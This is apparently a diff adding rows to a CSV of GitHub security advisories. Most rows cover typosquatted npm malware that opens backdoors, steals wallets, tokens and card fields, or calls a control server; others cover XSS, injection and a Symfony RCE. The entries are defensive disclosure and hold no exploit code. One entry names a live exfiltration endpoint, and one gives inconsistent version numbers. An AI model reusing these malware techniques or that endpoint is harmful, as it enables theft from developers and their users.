+1.4.0,GHSA-w7wg-24g3-2c78,2021-09-30T20:29:47Z,2020-09-02T21:14:17Z,,[],Malicious Package in requset,"All versions of `requset` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'requset'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/869'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rjvj-673q-4hfw,2021-10-04T20:53:02Z,2020-09-04T17:54:31Z,,[],Command Injection in traceroute,"All versions of `traceroute` are vulnerable to Command Injection. The package fails to sanitize input and passes it directly to an `exec` call, which may allow attackers to execute arbitrary code in the system. The `trace` function is vulnerable and can be abused if the `host` value is controlled by an attacker.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'traceroute'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'PACKAGE', 'url': 'https://github.com/jaw187/node-traceroute'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:traceroute:20160311'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1465'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w973-2qcc-p78x,2021-09-28T16:56:35Z,2020-09-11T21:19:09Z,,['CVE-2017-5858'],User Impersonation in converse.js,"Versions of `converse.js` prior to 1.0.7 for 1.x or 2.0.5 for 2.x are vulnerable to User Impersonation. The package provides an incorrect implementation of [XEP-0280: Message Carbons](https://xmpp.org/extensions/xep-0280.html) that allows a remote attacker to impersonate any user, including contacts, in the vulnerable application's display. This allows for various kinds of social engineering attacks.
+
+
+## Recommendation
+
+If you're using `converse.js` 1.x, upgrade to 1.0.7 or later.
+If you're using `converse.js` 2.x, upgrade to 2.0.5 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'converse.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.7'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'converse.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-5858'}, {'type': 'WEB', 'url': 'https://github.com/jcbrand/converse.js/commit/42f249cabbbf5c026398e6d3b350f6f9536ea572'}, {'type': 'PACKAGE', 'url': 'https://github.com/jcbrand/converse.js'}, {'type': 'WEB', 'url': 'https://rt-solutions.de/en/2017/02/CVE-2017-5589_xmpp_carbons/'}, {'type': 'WEB', 'url': 'https://rt-solutions.de/wp-content/uploads/2017/02/CVE-2017-5589_xmpp_carbons.pdf'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CONVERSEJS-449664'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/974'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2017/02/09/29'}, {'type': 'WEB', 'url': 'http://openwall.com/lists/oss-security/2017/02/09/29'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/96183'}]","{'cwe_ids': ['CWE-20', 'CWE-346'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:42:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c6f3-3c98-2j2f,2021-09-30T21:55:38Z,2020-09-02T21:39:46Z,,[],Malicious Package in jquerz,"Version 1.0.1 of `jquerz` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jquerz'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/907'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-67mp-pcv9-vvq6,2021-09-30T16:35:36Z,2020-09-03T22:57:14Z,,[],Malicious Package in jr-sha3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jr-sha3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1279'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:33Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h9wr-xr4r-66fh,2020-08-31T18:46:37Z,2020-09-03T18:20:20Z,,[],Cross-Site Scripting in dmn-js-properties-panel,"Versions of `dmn-js-properties-panel` prior to 0.8.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize input in specially configured diagrams, which may allow attackers to inject arbitrary JavaScript in the embedding website.
+
+
+## Recommendation
+
+Upgrade to version 0.3.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'dmn-js-properties-panel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1081'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-76wf-2xcf-6wmx,2023-07-27T20:16:16Z,2020-09-03T00:31:28Z,,[],Malicious Package in ngx-pica,"Version 1.1.5 of `ngx-pica` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 1.1.4",[],"[{'package': {'ecosystem': 'npm', 'name': 'ngx-pica'}, 'versions': ['1.1.5']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/948'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h232-fpqx-mqgr,2021-09-29T20:45:11Z,2020-09-03T21:03:15Z,,[],Malicious Package in log-symboles,"Version 2.1.0 of `log-symboles` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'log-symboles'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1195'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:50:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-69r6-7h4f-9p7q,2021-09-29T20:32:46Z,2020-09-03T20:41:01Z,,[],Malicious Package in discord.js-user,"All versions of `discord.js-user` contain malicious code. The package uploads the user's Discord token to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure any compromised tokens are invalidated.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'discord.js-user'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1177'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:50:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-38vq-cjh5-vw7x,2021-09-30T20:04:09Z,2020-09-03T18:13:41Z,,[],Malicious Package in nodes.js,"All versions of `nodes.js ` contain malicious code. The package searches and installs globally thousands of packages based on keywords `node`, `react`, `react-native`, `vue`, `angular` and `babel` to fill the system's memory.
+
+
+## Recommendation
+
+Remove the package from your environment and validate what packages are installed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nodes.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1074'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:23Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6pq3-928q-x6w6,2021-06-07T22:49:29Z,2020-09-03T15:51:28Z,,['CVE-2020-8147'],Prototype Pollution,"All versions of `utils-extend` are vulnerable to prototype pollution. The `extend` function does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'utils-extend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8147'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/801522'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1502'}]","{'cwe_ids': ['CWE-471'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:01:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g2c4-4m64-vxm3,2021-09-29T21:25:10Z,2020-09-03T22:15:25Z,,[],Malicious Package in buffer-yor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffer-yor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1254'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jh67-3wqw-cvhr,2021-10-01T14:35:02Z,2020-09-03T23:13:52Z,,[],Malicious Package in js-sxa3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-sxa3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1293'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cpgr-wmr9-qxv4,2020-08-31T18:43:20Z,2020-09-11T21:20:14Z,,[],Cross-Site Scripting in serve,"Versions of `serve` prior to 10.0.2 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize filenames, allowing attackers to execute arbitrary JavaScript in the victim's browser through files with names containing malicious code.
+
+
+## Recommendation
+
+Upgrade to version 10.0.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'serve'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/398285'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/992'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:43:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9r3m-mhfm-39cm,2020-08-31T18:42:08Z,2020-09-11T21:10:29Z,,[],Incorrect Calculation in bigint-money,"Versions of `bigint-money` prior to 0.6.2 are vulnerable to an Incorrect Calculation. The package incorrectly rounded certain numbers, which could have drastic consequences due to its usage in financial systems.
+
+
+## Recommendation
+
+Upgrade to version 0.6.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'bigint-money'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.2'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/962'}]","{'cwe_ids': ['CWE-682'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:42:08Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3mhm-jvqj-fvhg,2021-09-30T17:14:42Z,2020-09-03T23:09:37Z,,[],Malicious Package in js-sia3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-sia3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1290'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hpr5-wp7c-hh5q,2021-09-23T21:50:21Z,2020-09-01T19:37:29Z,,[],Cross-Site Scripting in mrk.js,"Versions of `mrk.js` before 2.0.1 are vulnerable to cross-site scripting (XSS) when markdown is converted to HTML.
+
+
+## Recommendation
+
+Update to version 2.0.1 or later and use `mark.sanitizeURL()` for any `src` and `href` attributes when extending the markdown.",[],"[{'package': {'ecosystem': 'npm', 'name': 'mrk.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/heyitsmeuralex/mrk/pull/3'}, {'type': 'PACKAGE', 'url': 'https://github.com/heyitsmeuralex/mrk'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/587'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:28:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xq8r-r72r-pqwm,2021-06-11T15:15:21Z,2020-09-01T16:13:18Z,,['CVE-2016-10681'],Downloads Resources over HTTP in roslib-socketio,"Affected versions of `roslib-socketio` insecurely download an executable over an unencrypted HTTP connection.
+
+In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `roslib-socketio`.
+
+
+## Recommendation
+
+No patch is currently available for this vulnerability.
+
+The best mitigation is currently to avoid using this package, using a different package if available.
+
+Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'roslib-socketio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10681'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/292'}]","{'cwe_ids': ['CWE-311'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:18:07Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hwh3-fhf6-73x9,2021-10-01T20:38:19Z,2020-09-04T15:36:09Z,,[],Malicious Package in bictoinjs-lib,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bictoinjs-lib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1356'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7j93-5m2h-rvjx,2021-10-01T20:37:33Z,2020-09-04T15:32:46Z,,[],Malicious Package in bconi,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bconi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1353'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p9vv-3945-x93h,2021-09-27T13:59:52Z,2020-09-02T15:47:10Z,,[],Cross-Site Scripting in semantic-ui-search,"All versions of `semantic-ui-search` are vulnerable to Cross-Site Scripting. Lack of output encoding on the selection dropdowns can lead to user input being executed instead of printed as text.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'semantic-ui-search'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Semantic-Org/Semantic-UI/issues/4498'}, {'type': 'PACKAGE', 'url': 'https://github.com/Semantic-Org/Semantic-UI'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/760'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:34:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3h99-v4qw-p2h5,2021-10-01T20:57:40Z,2020-09-03T19:41:56Z,,[],Malicious Package in coinpayment,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'coinpayment'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1382'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mrx7-8hxf-f853,2021-09-23T21:33:20Z,2020-09-01T15:36:27Z,,['CVE-2016-1000233'],Cross-Site Scripting in swagger-ui,"Affected versions of `swagger-ui` are vulnerable to cross-site scripting. This vulnerability exists because `swagger-ui` automatically executes external Javascript that is loaded in via the `url` query string parameter when a `Content-Type: application/javascript` header is included.
+
+An attacker can create a server that replies with a malicious script and the proper content-type, and then craft a `swagger-ui` URL that includes the location to their server/script in the `url` query string parameter. When viewed, such a link would execute the attacker's malicious script.
+
+
+## Recommendation
+
+Update to 2.2.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'swagger-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000233'}, {'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-ui/issues/1863'}, {'type': 'PACKAGE', 'url': 'https://github.com/swagger-api/swagger-ui/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/131'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:11:55Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cfc5-x58f-869w,2021-10-01T20:59:50Z,2020-09-03T19:40:55Z,,[],Malicious Package in conistring,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'conistring'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1389'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:30Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wp2p-q35g-3rjj,2021-10-01T13:29:21Z,2020-09-01T21:13:01Z,,[],Malicious Package in soket.io,"All versions of `soket.io` are considered malicious. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When executed, the package calls home to a Command and Control server to execute arbitrary commands.
+
+
+## Recommendation
+
+This package was published to the npm Registry for a very short period of time. If you happen to find it in your environment you should revoke and rotate all credentials found on the compromised machine, as well as completely erase the affected machine and reinstall your Operating System.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'soket.io'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/686'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:32:45Z', 'nvd_published_at': None}"
+1.4.0,GHSA-37vc-gwvp-6cgv,2021-10-01T20:39:59Z,2020-09-04T15:42:49Z,,[],Malicious Package in bitcoijns-lib,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bitcoijns-lib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1362'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:27Z', 'nvd_published_at': None}"
+1.4.0,GHSA-754h-5r27-7x3r,2023-01-24T18:07:50Z,2020-09-02T17:29:56Z,,['CVE-2020-15094'],RCE in Symfony,"Description
+-----------
+
+The `CachingHttpClient` class from the HttpClient Symfony component relies on the `HttpCache` class to handle requests. `HttpCache` uses internal headers like `X-Body-Eval` and `X-Body-File` to control the restoration of cached responses. The class was initially written with surrogate caching and ESI support in mind (all HTTP calls come from a trusted backend in that scenario). But when used by `CachingHttpClient` and if an attacker can control the response for a request being made by the `CachingHttpClient`, remote code execution is possible.
+
+Resolution
+----------
+
+HTTP headers designed for internal use in `HttpCache` are now stripped from remote responses before being passed to `HttpCache`.
+
+The patch for this issue is available [here](https://github.com/symfony/symfony/commit/d9910e0b33a2e0f993abff41c6fbc86951b66d78) for the 4.4 branch.
+
+Credits
+-------
+
+I would like to thank Matthias Pigulla (webfactory GmbH) for reporting and fixing the issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.4.13'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.1.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.4.13'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.1.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/symfony/symfony/security/advisories/GHSA-754h-5r27-7x3r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15094'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/d9910e0b33a2e0f993abff41c6fbc86951b66d78'}, {'type': 'PACKAGE', 'url': 'https://github.com/symfony/symfony'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HNGUWOEETOFVH4PN3I3YO4QZHQ4AUKF3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VAQJXAKWPMWB7OL6QPG2ZSEQZYYPU5RC/'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/symfony/http-kernel'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/symfony/symfony'}]","{'cwe_ids': ['CWE-212'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-02T17:29:29Z', 'nvd_published_at': '2020-09-02T18:15:00Z'}"
